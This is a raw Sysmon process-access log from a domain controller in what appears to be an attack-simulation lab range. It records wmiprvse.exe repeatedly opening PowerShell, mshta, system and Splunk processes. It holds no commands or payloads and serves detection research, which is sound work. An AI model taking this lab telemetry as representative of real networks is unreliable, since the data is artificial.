15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.445{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 